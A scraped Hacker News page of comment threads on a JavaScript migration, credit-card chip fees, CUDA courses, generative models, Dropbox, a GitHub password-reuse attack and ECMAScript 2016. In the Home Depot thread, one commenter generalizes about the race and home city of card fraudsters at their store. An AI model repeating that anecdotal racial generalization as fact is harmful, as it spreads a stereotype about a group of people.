I'm about halfway through migrating a ~30kloc ES5 codebase to ES6 with a transpiler (Babel), linter (ESLint), and fast test suite (Mocha) [1]. Once all files are going through the transpiler I'll probably add TypeScript or Flow. We already had RequireJS in place so the conversion from AMD to ES6 module format has been pretty straightforward, but I'm continually amazed with every file I convert I usually find a couple real bugs with the linter. The most common have been:

* Undefined variables referenced in a seldom-traveled conditional branch.

* Leaked globals due to missing `var` keyword.

Every bug I find is immediate feedback that this is a worthwhile use of our time.

[1] https://medium.com/@kevanahlquist/evolution-of-javascript-at...

3
rkwz 22 hours ago 5 replies      
I curious how using Typescript makes the project more "structured" compared to using plain JS.

Typescript just gives you static types and classes. I can understand "classes" make the code more modular and thereby more structured, but can't you already do that using ES5 "class"? Types help in catching errors early and can help in documenting the interface of the methods etc.

Also, if the other problem was isolating the scope of modules and dependency injection, it could be easily done using Requirejs and all the modules could be concatenated during build time. Webpack is a cool tool, but given the nature of its documentation, the maintenance would be really costly in the long run. Requirejs is just more established and satisfies all the author's requirements.

It would've been really helpful if the author had included additional reasoning behind the choices made.

4
Dolores12 22 hours ago 1 reply      
TLDR: rename files to .ts, download type definitions for external libraries, silence TypeScript compiler warnings using 'any'
5
nudpiedo 22 hours ago 5 replies      
By using haxe he could have started now transpiling some of those 10k lines also to the python backend just for free plus all the additional prepocessor and type checks that are common for typescript and haxe.

I don't really understand why people jumps to typescript and not haxe, which in my opinion has more strategic advantages and warranties (with very few exceptions).

Is perhaps just a marketing topic?

6
AnkhMorporkian 22 hours ago 4 replies      
I've always wondered if you could create a runtime inferrer of types for these sorts of projects. As in, attach something that observes function calls and sees over the course of some amount of time what types are passed into them, and have them make a best guess of what arguments are what types. While of course it couldn't be perfect, it could save a lot of grunt work.

I made a quick version of this idea in Python 3.4, where it was much easier since I could modify the AST on import, but I never quite got it where I wanted it and sort of lost passion.

7
alphaomegacode 6 hours ago 0 replies      
Lots of intelligent replies here (like much of HN); having a Java & C/C++ background, I picked up Javascript some yrs ago for web work.

Now, I don't know how/if to move to Typescript or ES6? And any resources/books/vids you all highly recommend? (I built some corp stuff in Angular 1 but guess I'll have to move to TS for Ang 2 or learn React?)

Many commenters in this thread seem experienced in TS so thanks in advance for sharing any advice

8
mark_l_watson 15 hours ago 1 reply      
Nice article, and I am going to give webpack a try. I took an eDX class in Typescript a year ago and really like the language but decided modern JavaScript was getting "good enough." I regret that decision sometimes because Tyoescript really is better IMHO.
9
balls187 10 hours ago 0 replies      
> Since globals defined in different JavaScript files share a common namespace, I often found it convenient to reference globals...I knew all along that these were bad habits

This line resonated with me. In my first CS course (Intro to programming), I learned about why using globals can be problematic.

A good reminder that engineering is all about trade-offs. Sacrifice future maintainability for present day productivity.

10
mizzao 11 hours ago 1 reply      
I feel that academic code is generally more prone to bad-smell pressure than industry code, since people generally produce for papers and deadlines and "just get it working for now." It's good to see that it's possible to produce some semblance of order in the constant grind.
11
partycoder 22 hours ago 0 replies      
A machine is faster and more reliable than a human at comparing. Matching types for verification is one of those things.
23
Statistics for Hackers [video] youtube.com
330 points by david90  2 days ago   23 comments top 6
1
harveywi 2 days ago 1 reply      
Similar in spirit to John Rauser's 2014 Strata Conference + Hadoop World keynote "Statistics Without the Agonizing Pain" (https://youtu.be/5Dnw46eC-0o).
2
minimaxir 2 days ago 0 replies      
Previous discussion based on an earlier 2015 version of the slide deck: https://news.ycombinator.com/item?id=10244950

Back then, I wrote a small tutorial on how to implement and animate the bootstrap technique in R/ggplot2 based on the talk: http://minimaxir.com/2015/09/bootstrap-resample/

3
benbenolson 2 days ago 0 replies      
I actually watched the majority of this, it's a very interesting talk. I'd imagine that all of us are going to need to use at least some statistics one day, so I consider it time well spent.
4
kensai 2 days ago 1 reply      
Really nice. Is there a similar video in R?
5
hayksaakian 2 days ago 4 replies      
i wish there was a way to 'force mono' on youtube so i could get the same audio from two sides of my headphones.

sounds like a really interesting talk, but it's painful to listen to from only 1 ear.

6
voiceclonr 2 days ago 0 replies      
Nice one!
24
Home Depot Files Antitrust Lawsuit Against Visa, MasterCard wsj.com
275 points by ikeboy  13 hours ago   412 comments top 25
1
kylecordes 12 hours ago 27 replies      
It seems to me that these alternatives (Chip & sign, chip and pin, carrying a credit card at all) all compete poorly with the "tap my phone to pay" offerings. I use the latter whenever and wherever it is offered. As I understand it offers greater security than any of the above, and more importantly (life is short) it is much faster. (Though there is one wrinkle. Most point-of-sale systems process phone payments with just the tap. A few of them seem to instead treat it as equivalent to a swipe, and then launch you into a legacy multistep handshake thereafter.)

For reasons I don't understand, the credit card makers have spent many years bringing the new chip cards to market, they include much higher technology than ever offered before, yet the payment process takes much longer. Of course these few seconds don't matter that much per transaction, but think it might be enough to actually make a meaningful difference in staffing levels and line lengths at big stores in December.

I do understand the fees though. The credit card brands and banks have worked themselves, through years of diligent effort, into a business where they can impose a kind of "tax" of 3% on most of the retail economy across the entire US. This is obviously of immense economic value to them, and they will work very hard at every level to maintain it for as long as possible. On the other hand, paying these companies a 3% tax on every retail transaction is... rather surprising in the grand scheme of things, and seems unlikely to persist for that much longer.

2
Adutude 10 hours ago 9 replies      
It would be nice if hacker news did not accept links to pay-walled sites
3
elthran 12 hours ago 8 replies      
Are there any Americans here who are able to explain why the US is so backwards when compared to European countries?

Visa and Mastercard and the banks all offer Chip and Pin services here in the UK, and have done for years.

I can understand the delay in adopting chip cards, with the ridiculously large number of terminals and cards that would have to be replaced - but I really don't see why when you're performing the migration to cards with a chip, you wouldn't implement PIN at the same time

4
teilo 12 hours ago 0 replies      
The good news is that upgrading all these terminals to chip will make chip-and-pin a simple matter of a software update.

I don't know if it was a matter of profit so much as fear of customer alienation. First they get customers used to using the chips. Then they can make them use pins later.

The biggest hurdle will be past once all the chip terminals actually work. It's crazy how many vendors were forced to install these things before the processors were even able to process chip transactions. Most small vendors in this area of the country still are not able to accept chip cards despite having the newer hardware. Thus they are now liable for fraudulent transactions on swiped cards because their processors cannot get their sh*t together.

But once that debacle is resolved, chip and pin should follow as a matter of course.

Frankly, I too wish they had just ripped the bandaid off. After having spent a couple weeks in europe, it is idiotic how many restaurants in non-tourist towns have to scramble to find the one terminal that can print a signature slip for their American guests.

5
uptown 12 hours ago 1 reply      
I tried to pay with ApplePay at The Home Depot but their readers wouldn't allow it. If your company is seriously concerned about fraud, maybe allow customers to use available systems that help prevent it.
6
ccvannorman 10 hours ago 3 replies      
I wish that the shopping experience was

1) I go to a store and pick up what I need2) I walk out of the store with everything and take it home3) Store knows what I took (RFID tags)4) Store knows who I am (Cameras, gait analysis, face, whatever, fingerprint at the door, phone swipe, credit card swipe, be creative)5) I receive an e-bill when the vendor identifies me6) I set up an auto-pay on my e-bill

Honestly, tap-to-pay doesn't seem like any difference at all vs cash or credit to me. Show me something where I don't even need to interact on exiting the store!

7
vermontdevil 10 hours ago 2 replies      
A typical process using a chip card:

1) Swipe card (out of habit)

2) Machine says use chip card reader.

3) Insert card in reader.

4) Machine freezes.

5) Get support - reset machine quickly.

6) Plan to swipe but luckily remembered. Inserts in slot.

7) Wait for what feels like hours to get it going.

8) Enter code

9) Approved! Takes card out.

Blah. I am sure in few years things will get better though. Or maybe just go with Apple Pay (or that type).

8
dean 12 hours ago 1 reply      
In Canada, Walmart is suing Visa for 'unacceptably high' fees. http://www.cbc.ca/news/business/walmart-canada-visa-1.363095...
9
ikeboy 13 hours ago 0 replies      
https://archive.is/wmqqR has it without paywall
10
iamleppert 11 hours ago 3 replies      
At this point, what is stopping some other company from coming in and giving all the merchants a square-like payment terminal that doesn't use the credit card networks?

I honestly think this is something that needs to be done as a public works project, or a non-profit.

11
coryfklein 5 hours ago 1 reply      
Digital currencies enable me to send $10 across the globe for less than a penny and Visa charges $0.30 - I have a hard time imagining a future where the system allows for such a large inefficient gap to remain for long.

Not saying that current digital currencies (bitcoin, etc) will replace Visa. Just that they show that this problem doesn't cost 3% of the transaction to solve.

12
cmurf 12 hours ago 1 reply      
What happened to RFID/contactless? All of my cards had RFID, and then when they were replaced got chipped. No RFID. I called all of the issuers and they said chip only, no RFID option available. It's almost like they want us to use our phones instead of the card itself?

And why are chip transactions so much slower than either swipe or contactless transactions? It really is something of a regression.

13
jdeibele 9 hours ago 1 reply      
I received a debit card from my relatively small credit union a few days ago. I was very surprised to see that it didn't have a chip in it.

It seems likely that the fees they earn from "signature transactions" must be significant enough that they don't want anyone using it as a chip card.

An alternative answer is that the cost of the cards themselves is so much that they don't want to do it. When I lost my wallet, a different credit union charged me $10 for a replacement card. And neither had a chip. The other banks did it for free.

14
crb002 9 hours ago 0 replies      
Every chip reader in Des Moines uses the same reader hardware, and every software install on them is radically different. Somebody is making bank writing the glitchy touch screen apps.
15
frandroid 8 hours ago 0 replies      
This seems like part of the global retailer war against credit card companies, such as seen here in Canada: https://www.thestar.com/news/canada/2016/06/11/walmart-canad...
16
17
willhamina 7 hours ago 0 replies      
I've gone to cash whereever possible. I needn't monitor my CC accounts so closely, reconcile them at end-of-month nor worry about stolen cards. Sellers love cash.

Best of all I spend far less - I am more parsimonious if I pay with cash.

18
ArkyBeagle 9 hours ago 0 replies      
This seems similar to WalMart's recent decision to stop taking some credit cards in Canada.

https://news.ycombinator.com/item?id=11887469

19
callmeed 9 hours ago 0 replies      
Where I am in California only about 1/3 of merchants are accepting chip cards (even though I believe the deadline was October of last year).
20
tosseraccount 10 hours ago 0 replies      
American Express sued Visa and Mastercard in 2004: http://www.nbcnews.com/id/6494456/ns/business-us_business/t/...

They settled in 2007 : http://www.nytimes.com/2008/06/26/business/26credit.html

Mastercard paid $1.8 billion, Visa paid $2.1 billion

MA and V have way outperformed AXP since.

21
pigpaws 13 hours ago 1 reply      
article NOT behind a paywall: http://boston.cbslocal.com/2016/06/15/home-depot-visa-master...

TL;DR: chipped cards are not as secure as swiped cards. Also, CC processing is expensive.

22
unabst 10 hours ago 0 replies      
tl;tr Fuck these cards. Go team Depot. Walmart is suing too. [0]

As someone with one foot in retail, I can honestly say these cards are not doing anyone any favors. Fraud is rampant and there are shoppers that travel the world [0.5] with stolen cards just to spend stolen cards and gift cards [1].

During the transition to chip, Square had liability shift for non-chip cards [2], but we failed to meet the requirements for a few transactions because we insisted on entering the ZIP for security, which requires key entry even at an additional fee. There was no feature to enable ZIP code entry for swipes. In these cases, trying to heighten security with additional measures was the wrong move for us. We should have just let them swipe and Square eat the cost.

Apple has been burying a scandal of its own with Apple Pay fraud. Once after a shopper left, we immediately received negative feedback through Square from someone claiming they didn't just buy anything from our store. Well, when someone has a phone, there is nothing to check. Though Apple Stores seem to have been hit hard, which seems appropriate [3].

The main problems are, 1) as retailers we cannot treat every customer as a crook nor can we profile them [4], 2) if they jump through all the hurdles, we can't then not sell them something even if something seems odd, and 3) in the case of Apple Pay, gift cards, and some swipe transactions, retailers are actually covered so even if buyers appear suspect, there is zero incentive to call them out, 4) the police don't treat it as shoplifting, and 5) some of the worst offenders are not suspicious at all, and can even be contesting their own purchases on purpose.

This is just a fact, but most of the scammers that came through our store were from NY and were black (again, just a fact, not saying anything about race or NY, though something does seem to be going on there [4][5]).

--

[0] http://www.wsj.com/articles/wal-mart-sues-visa-over-chip-ena...

[0.5] http://arstechnica.com/tech-policy/2014/11/authorities-arres...

[1] http://www.tripwire.com/state-of-security/risk-based-securit...

[2] https://squareup.com/news/why-square-sellers-can-rest-easy-a...

[3] http://www.nytimes.com/2015/03/17/business/banks-find-fraud-...

[4] http://www.ag.ny.gov/press-release/ag-schneiderman-announces...

[5] http://nypost.com/2016/04/26/rappers-used-stolen-credit-card...

23
chinathrow 13 hours ago 1 reply      
The whole field is so ripe for disruption yer nothing ever materialises....
24
logicallee 13 hours ago 3 replies      
if they had a trust, credit card processing fees would be 7%, not 3%. they obviously don't.

-

correction: "If you're looking for quick numbers, here you go: the average credit card processing cost for a retail business where cards are swiped is roughly 1.95% - 2%" source: https://www.cardfellow.com/average-fees-for-credit-card-proc...

why would a trust have rates that low? It seems competitive to me...

25
post_break 13 hours ago 1 reply      
After Home Depot showed it didn't understand security and my credit card was spoofed I've tried to stop shopping there. It's difficult sometimes.
25
CS 179: GPU Programming caltech.edu
327 points by kercker  3 days ago   31 comments top 10
1
ChristianGeek 3 days ago 1 reply      
I'm taking a free course in CUDA programming on Udacity at the moment that's co-taught by a guy from NVIDIA Research and a professor from UC Davis. If you're looking for something that starts from the basics and is really easy to follow, I highly recommend it.

https://www.udacity.com/course/intro-to-parallel-programming...

2
anocendi 3 days ago 2 replies      
It is very cool to see that the class is being taught by a group of juniors/seniors (checked the top two, first one was a senior and second one was a junior), and an appointed faculty is listed only as a supervisor ....

I am really interested in the class outcome, and would love to hear what the students in class feel about this arrangement ....

I can see the good things about this. It gives the instructor/TA students an opportunity to grow while giving the peer-learning atmosphere to students in class. Plus, the students in class will learn from their peers who has the latest working knowledge of CUDA fresh in their heads, and this arrangement also frees up a faculty (or two) from having to prepare the course so that they can do their faculty/research work (prepping and teaching a class, especially an interesting and engaging one, is a really draining experience on the part of the faculty as well.)

Only downside I can see could be managing the class well enough so that class time is efficiently utilized. But I believe this should be covered by the faculty who is in supervisor position ....

3
jhj 2 days ago 0 replies      
For someone that knows a thing about CUDA and parallel programming already, the best reference is Paulius Micikevicius presentations. If the words in it mean something to you, these 100+ slides explain more about the hardware and programming model than any other documentation youll find elsewhere.

http://on-demand.gputechconf.com/gtc/2013/presentations/S346...

If you want to really master CUDA, Nvidia GPUs and the various programming model tradeoffs, the best thing is to write a GEMM kernel and a sort kernel from scratch. To take it even further, write two of each: one that optimizes large GEMMs/sorts, and one that optimizes for batches of small GEMMs (or large GEMMs with tiny (<16 or <32) `k` or another dim) / batches of small sorts. Specialization for different problem configurations is often the name of the game.

For GEMM, you can work through the simple GEMM example in the CUDA documentation, then take a look at the Volkov GEMM from 2008, then the MAGMA GEMM, then the Junjie Lai / INRIA GEMM, then eventually the Scott Gray / Nervana SASS implementation, in increasing order of complexity and state-of-the-art-ness.

4
rmonroe 3 days ago 0 replies      
I took this class last year. Although it was nice to see undergraduates instructing the class, the lack of teaching experience really showed: the students were pretty rough around the edges in terms of their examples and explanations. About 2/3rds of classes ended early (at least this is better than heavily wasted time). This somewhat fits in with the unofficial caltech policy of "figuring out the finer details on your own".

That said, I thought the practical nature of the class was a refreshing switch from the heavily theoretical foundation of my other CS coursework experiences.

5
gaius 3 days ago 7 replies      
Why CUDA not OpenCL I wonder?
6
gtani 3 days ago 0 replies      
The lecture slides are very good.

For anybody following along, there's 2 other books, Wrox Professional Cuda programming, and Cuda for Engineers, which would ease entry for those who aren't versed in HPC (PDE solvers, BLAS/LAPACK, Fourier transforms etc). The Storti/Yurtoglu book is the best intro i've seen to the topic, the Wrox book covers a lot of the material in Wilt's Handbook, not as exhaustively, but more up to date (Kepler vs Fermi).

________________________

There's other course material online, UIUC, oxford (especially good, IMO)

http://people.maths.ox.ac.uk/gilesm/cuda/

http://cseweb.ucsd.edu/classes/fa15/cse260-a/lectures.html

https://www.coursera.org/course/hetero

7
Negative1 3 days ago 0 replies      
Are there any course videos available anywhere?
8
bathory 3 days ago 0 replies      
Is there any resource as good, that targets a recent version of OpenCL?
9
joosebox 3 days ago 0 replies      
Anyone know how this compares to the course(s) NVIDIA offers on Udacity?
10
hubatrix 3 days ago 0 replies      
Wish there were videos available for the same course ! Can someone suggest a good lecture series with videos, other than udacity.
26
Generative Models openai.com
334 points by nicolapcweek94  1 day ago   54 comments top 13
1
hasenj 1 day ago 8 replies      
This is so cool and I can't help but feel like I'm missing something important that's taking place and has huge potential.

As a busy programmer who gets exhausted at night from the mental effort required at my day job, I have a feeling like I will never be able to catch up at this rate.

Are there any introductory materials to this field? Something I can read slowly during the weekends, that gives an overview of the fundamental concepts (primarily) and basic techniques (secondarily) without overwhelming the reader in the more advanced/complicated techniques (at least during the beginning).

I'd really appreciate any recommendations.

2
andreyk 1 day ago 0 replies      
Brief summary: a nice intro about what generative models are and the current popular approaches/papers, followed by descriptions of recent work by OpenAI in the space. Quick links to papers mentioned:

Improving GANs https://arxiv.org/abs/1606.03498

Improving VAEs http://arxiv.org/abs/1606.04934

InfoGAN https://arxiv.org/abs/1606.03657

Curiosity-driven Exploration in Deep Reinforcement Learning via Bayesian Neural Networks http://arxiv.org/abs/1605.09674

Generative Adversarial Imitation Learning http://arxiv.org/abs/1606.03476

I think the last one seems very exciting, I expect Imitation Learning would be a great approach for many robotics tasks.

3
johnwatson11218 1 day ago 1 reply      
Have these techniques been used to generate realistic looking test data for testing software? I have had ideas along these lines but people think I'm talking about fuzz testing when I try and describe it.

I'm imagining something where you take a corporate db and reduce it down to a model. Then that can be shared with third parties and used to generate unlimited amounts of test data that looks like real data w/o revealing any actual user info.

4
brandonb 1 day ago 1 reply      
Very cool. As you're thinking about unsupervised or semi-supervised deep learning, consider medical data sets as a potential domain.

ImageNet has 1,034,908 labeled images. In a hospital setting, you'd be lucky to get 1000 participants.

That means those datasets really show off the power of unsupervised, semi-supervised, or one-shot learning algorithms. And if you set up the problem well, each increment of ROC translates into a life saved.

Happy to point you in the right direction when the time comesmy email is in my HN profile.

5
viach 1 day ago 2 replies      
Looks like fake accounts on Facebook will have real unique userpics soon
6
ElHacker 1 day ago 1 reply      
I really like that they used TensorFlow and published their code in GitHub. It will help a lot of people like me, that are new in the field and want to learn more about generative models. Amazing work by the OpenAI team!
7
bradscarleton 1 day ago 1 reply      
It looks like they are using both TensorFlow and Theano. Is there a reason to use both?
8
j2kun 1 day ago 2 replies      
The actual outputs look grotesque. Disembodied dog torsos with seven eyeballs and such. It's cool, but to me this is clearly showing the local nature of convolutional nets; it's a limitation that one has to overcome if one is to truly generate lifelike images from scratch.
9
dkarapetyan 1 day ago 1 reply      
The generated images look like the stuff nightmares are made out of. Which is to say they're extremely aesthetically unpleasant. So what exactly have these networks learned?
10
Rexxar 1 day ago 1 reply      
Can we see somewhere the generated images with higher resolution ?
11
zump 19 hours ago 0 replies      
Why do I constantly feel like I'm missing out with all this stuff?
12
pestaa 20 hours ago 0 replies      
What a beautifully presented research.
13
gradstudent 1 day ago 3 replies      
Interesting topic, tedious article. Paraphrasing:

Q: What's a generative model?

A: Well, we have these neural nets and...

Ugh. I understand the excitement for one's own research but if the point is to make these results accessible to a wider audience then it's important not to get lost in the details, at least not right away. IMO, there's very little here in the way of high-level intuition. If I did not already have a PhD, and some exposure to ML (not my area), I would probably find this article entirely indecipherable. Again, paraphrasing:

Q: OK, so I understand you want to create pictures that resemble real photos. And you really like this DCGAN method, right?

A: Yes! See, it takes 100 random numbers and...

Come on guys. You can do better.

27
Dropbox says it is cash flow positive, in no rush to IPO techcrunch.com
260 points by uptown  3 days ago   165 comments top 24
1
Razengan 3 days ago 10 replies      
I wonder what features Dropbox can offer that won't inevitably be surpassed by Google Drive, iCloud Drive, and OneDrive.

To me, their main strength seems to be that they have the best cross-platform UI/UX right now, but even that may not be the case for long.

Maybe they could evolve/branch into a general-purpose file hosting service, where people can use it to publicly share images (like imgur) and music (like Soundcloud) with the appropriate UI for each case (or spinoff site, e.g. Imagebox and Musicbox) except people would just need one account to comment/vote on everything. Who knows, maybe they can even become an alternative to YouTube..

Let independent developers publish their games and apps from there, bypassing Steam and the other app stores, optionally charging a fee per user, with Dropbox taking a cut.

Maybe even offer a chatroom/messaging system, to compete with Slack/Skype etc.

2
cylinder 3 days ago 9 replies      
More companies should disavow growth and aim to be stable cash generating entities. Dropbox is a utility. Unfortunately VCs don't like this.
3
bing_dai 3 days ago 3 replies      
I am surprised that Dropbox' investors would allow it. It also indicates that Dropbox likely does not have a Redemption Clause in their term sheet.

Redemption Clause basically says "if the company does not IPO or get acquired in X years, the company has to pay the investors back their money, plus a hefty interest".

It is a relatively unusual term, but not rarely-seen.

(Source: I used to work for a VC.)

4
post_break 3 days ago 3 replies      
Dropbox is the one service that I just can't replace. Nothing comes close to the ease of revisions/version control, restore, and sync. I sound like a bot but I've tried everything to find a replacement and I just keep coming back. It worries me because I don't like it when there is only one game in town.
5
refurb 3 days ago 2 replies      
Profitable or cash-flow positive? Those are two different things.

Cash flow positive - normal situation where the cash inflows during a period are higher than the cash outflows during the same period. Positive cash flow does not necessarily means profit, and is usually due to a careful management of cash inflows and expenditure.

6
TeMPOraL 3 days ago 5 replies      
I'm happy to hear that. As a Dropbox user and paying customer, it reassures me that they won't get acquihired or otherwise fuck up the product in a typical startup fashion any time soon.
7
tacos 3 days ago 1 reply      
> Dropbox says it is cash flow positive, in no rush to IPO

This means the fundamentals are a shitshow and that they couldn't even if they wanted to. Investors believe they can get a better valuation via private sale than risk letting the public market provide a reality check. (See also: Sam Altman.)

They're getting bought; it's just a matter of when and how bad things get first.

8
mark_l_watson 3 days ago 1 reply      
I love Dropbox's support for a GNU Linux client. That said, and ironically, I am no longer a paying customer since they put Condi Rice on their board of directors. If Rice quits their board, I will immediately become a paying customer again.

Annoying that Google and Microsoft don't have official Linux clients for GDrive and OneDrive, but at least their web based support is passable.

9
KB1JWQ 3 days ago 2 replies      
I wonder how their current and former employees view this decision.

I further wonder whether or not people leaving have a 90 day window to either exercise or forfeit their options.

10
mankash666 3 days ago 2 replies      
Just to bust their chops on valuation - box is valued at $1.42B today. Dropbox better have 10X in revenues and profits to justify the $10B valuation. My guess is that they don't, and hence disinclined to address public scrutiny of their financials and/or valuation.
11
PhasmaFelis 3 days ago 1 reply      
It is so bizarre to me that building a business that can make a profit and stand on its own is considered newsworthy in the tech economy.
12
hueving 3 days ago 1 reply      
I feel bad for the employees. Remember this is another risk when considering offers from startups. Your shares may be illiquid for a very long time.
13
nathan_f77 2 days ago 0 replies      
Damn, imagine being an early employee at Dropbox, holding onto a lot of stock that you can't sell until an IPO. This situation is probably your worst nightmare. If anything, you want the company to struggle a little bit so that they're forced to raise more money in an IPO.
14
ekiara 2 days ago 0 replies      
Great to hear an alternative story (i.e. a non-exit or IPO story) out of Silicon Valley.

mega.nz does not have the great desktop/device UI that dropbox has, and also Kim Dotcom has stated it can no longer be trusted after the company was seized by the New Zealand Government. But it offers 50GB to any new account. How do they manage to do this? And what is stopping someone from just registering a bunch of accounts on mega.nz and using that as their primary cloud backup? (maybe with the addition of encfs or something)

15
nemock 3 days ago 0 replies      
This is always a cool thing to see in Silicon Valley. Way to go, Dropbox.
16
laktak 2 days ago 0 replies      
I really like Dropbox but I will leave if they force anything like Infinity (http://blogs.dropbox.com/tech/2016/05/going-deeper-with-proj...) onto us users.
17
erikb 2 days ago 0 replies      
For the users it would be so great to have Google by Dropbox. I use Drive all day long, but only for Google documents. Everything on the computers is either hosted in Dropbox or in ownCloud. But I think Microsoft is much more likely to buy them than Google. What a pity.
18
sjg007 2 days ago 0 replies      
For me it should be seamless to send and recieve large files on your iPhone. You can do this in Dropbox but it isn't as simple as send to X via Dropbox.
19
nstj 3 days ago 0 replies      
> Houston claimed that Dropbox has been cash flow positive, emphasizing that this milestone for a business means you control your destiny. Instead of being funded by your investors, youre funded by your customers.

Accounts payable for SaaS businesses is the new VC on the block. Gold.

20
rtpg 2 days ago 0 replies      
Glad to hear Dropbox is cash flow positive. I was pretty worried at one point about what would happen to all the apps relying on Dropbox for sync

<insert platitude about open systems here>

21
JackPoach 2 days ago 0 replies      
I wish they'd make their finances more transparent, rather than just saying 'cashflow positive'.
22
gadders 2 days ago 0 replies      
Presumably this is against the interests of YC and the other VCs that invested, though?
23
ajharrison 2 days ago 0 replies      
Sounds like he wants someone to buy Dropbox.
24
gauravagarwalr 3 days ago 2 replies      
This is a bot! Flagged! OTOH Have you tried Google Drive?
28
GitHub Security Update: Reused Password Attack github.com
241 points by ejcx  2 days ago   131 comments top 12
1
kiwidrew 1 day ago 3 replies      
I received this e-mail and had my password reset by Github. Based on the "security history" shown in my Github account's setting page, my account wasn't compromised as there was no login activity during the past week.

I'm thinking that this is fallout from the LinkedIn breach, because this is the first high-profile breach which includes one of my e-mail addresses. (How do I know this? I'm using haveibeenpwned.com -- a free service that I highly suggest registering with.)

2
natch 2 days ago 2 replies      
What the page doesn't tell me is: What is their definition of an "affected" account?

Obviously one where an attempt was made, and succeeded, would count as affected.

But would an account where an attempt was made, and failed, also count?

What if the userid and password are correct, but 2FA stopped the attack on an account. Is that account affected, in their view?

3
ikeboy 1 day ago 3 replies      
I feel like sites should somehow preemptively disable passwords that have leaked publically. Is there a simple way for them to do so without downloading every leak themself? Is there a simple way for whitehats to help out? Whitehat means you can't test the site without their permission, but someone could have a database that they provide partial access to for sites without leaking and spreading it further themself?

Here's an idea I just thought of: sites should have a standardized, secondary place to log in, where if the login is correct it automatically disables the password and requires a reset. "Report a compromised account", as it were. Anyone (or maybe specific whitehat groups) should have explicit permission to try any logins they want there: after all, if they succeed in logging in then the right thing happens and the account is locked. It's impossible to gain any illicit advantage from such access because any correct credentials are locked as soon as you try them. (Is this assumption robust?) So whitehats could then take lists and throw them against sites that implement this standard, but no attackers can gain from this.

The only problem I see is that disabling rate limits would open you to DOS (also if multiple people use the same list, although better coordination would help solve that): maybe allow bulk uploads which take less bandwidth overall.

Does this idea have any value?

4
jrockway 2 days ago 6 replies      
I hadn't noticed that Github started supporting U2F. Nice to finally use my keys for something other than Google accounts.
5
arxanas 1 day ago 2 replies      
I got an email from Bitbucket earlier today warning me about unusual behavior on my account as a result of reused credentials. Is it an attack across several version-control services?
6
Pyppe 1 day ago 2 replies      
Related to password security: any of you guys using Chrome's ability to sync passwords to "Google cloud"?

I just started using it a few weeks ago. Supposedly it uses a password to encrypt the data, but I still don't feel too confident syncing them there. On the other hand.. damn it's so convenient between multiple devices.

7
ComodoHacker 1 day ago 2 replies      
This is far better than TeamViewer's response to the same threat lately.
8
markokrajnc 1 day ago 3 replies      
Passwords became hard to manage... now you have to choose >>different<< password for every site... Who can remember all those passwords? Only a password manager...
9
tuna-piano 2 days ago 1 reply      
Anecdote: I use an email account and a relatively simple password (3 relatively common words together) on LinkedIn. I don't use that email account much, but it was affected by the Linkedin hack. Today I get an email saying my Twitter account was accessed suspiciously (same credentials).

Power of the network effect that I won't leave Linkedin, and wouldn't think twice before spending money on the platform if I needed to recruit someone or do b2b sales. But screw Linkedin for not taking proper precautions.

10
ledude 2 days ago 1 reply      
just a random tidbit.. but the system currently allows you to set your password to what you previously had
11
brador 1 day ago 2 replies      
Why not do a site wide reset on every account?
12
akerl_ 2 days ago 2 replies      
"We immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts."
29
ECMAScript 2016 Approved ecma-international.org
220 points by gsklee  1 day ago   71 comments top 10
1
BinaryIdiot 23 hours ago 7 replies      
I wish this contained a delta between the previous release and this release. It's difficult to find the differences just by skimming.

Edit: apparently I hadn't realized that the changes were so few that what was in the outline really did cover everything. I thought it was a summation. My fault.

That being said I continue to be disappointed in the built-in standard library of JavaScript. As far as I can tell ECMAScript 2017 also has zero plans for incorporating useful libraries for file IO or sockets (currently both are provided through different APIs by node or the browser). This really needs to happen.

2
jsingleton 15 hours ago 2 replies      
So, ECMAScript 2015 is ES6 and ECMAScript 2016 (this) is ES7 [0]. I like the new features (promises, arrow functions etc.) but the naming is as confusing as Visual Studio. VS 2015 is the current version but VS 15 is the next one.

[0] https://en.wikipedia.org/wiki/ECMAScript

3
domenicd 22 hours ago 0 replies      
As always, see https://tc39.github.io/ecma262/ for the up-to-date spec that implementers use.
4
edwinjm 19 hours ago 1 reply      
"This specification also includes support for a new exponentiation operator and adds a new method to Array.prototype called includes."

Not much new here for regular JavaScript developers.

5
dpweb 17 hours ago 5 replies      
They should be working to make JS smaller and simpler and better. Focus on the philosophy of what JS should be. People instead tend to focus on 'new features'.

The power in JS is functional programming. For instance, grafting on Classes, was a mistake. They may focus on concepts like, how do we make sure we never create two ways to do the same thing - instead of how do we incorporate this new thing.

6
SimeVidas 1 day ago 0 replies      
504 pages according to Chromes print preview.
7
0xCMP 23 hours ago 4 replies      
Does anyone know if decorators made it in? I can't find them via the search at first glance. I'm guessing they're listed under a different name/section than I thought?
8
z3t4 21 hours ago 1 reply      
Why don't they "fix" the numeric system to be more exact? I'm talking about the float implementation. I don't think anyone depends on the floating point rounding errors. But we do spend a lot of time avoiding them. They totally "screwed up" the syntax in 2015, with many breaking changes, so why not fix the damn rounding errors!?
9
sktrdie 22 hours ago 1 reply      
Did Observables make it in with the `async function* SomeObservable() {}` type of syntax?
10
_pmf_ 13 hours ago 1 reply      
These 10 ECMA Features Taken From Actually Useful Languages And Presented As Cool Innovations Will Blow Your Mind!
30
'We're in a Bubble' samaltman.com
267 points by dwaxe  3 days ago   200 comments top 53
1
minimaxir 3 days ago 2 replies      
I'm disappointed to see this from Sam.

After Twilio filed for IPO, someone wrote a "here's what Hacker News said about Twilio," which only focused on the hilarious-in-hindsight but negative comments about the startup (https://news.ycombinator.com/item?id=11786464). Naturally, it got massive retweets from venture capitalists who espouse the haters-gonna-hate attitude.

As dang notes in that other comment thread, this kind of argument doesn't look at the other side at all: there have been some seriously shady dealings going on with unicorn startups. IPOs are failing. And let's not get started on Theranos.

2
YZF 3 days ago 4 replies      
"Markets can remain irrational longer than you can remain solvent"

Or perhaps the more apt way of putting this in our times is:"Multiples will be crazy high as long as central banks keep interest rates crazy low"

Rather than thinking about this in terms of bubbles I think it's fair to say that the probability of getting very high ten year returns on the US stock market at these valuations is low. The problem is there's no other asset that will give you the chance of a better return. That's no coincidence.

Apple's P/E is 10.85 according to Yahoo Finance. That's low given current interest rates.

EDIT: The average Nasdaq P/E is 22.55 ... This is historically high but is ~4.4% vs. the 10 year treasury being 1.61% (and I say that painfully as I attempted to go short at one point). That is basically the story right there.

3
baristaGeek 3 days ago 6 replies      
For those of us who are young enough (30 or less) to not have witnessed the internet bubble at a conscious age, we might be tricked to think that we're in a bubble due to certain indicators. The NASDAQ index, the valuation prices, the money poured into venture capital, etc.

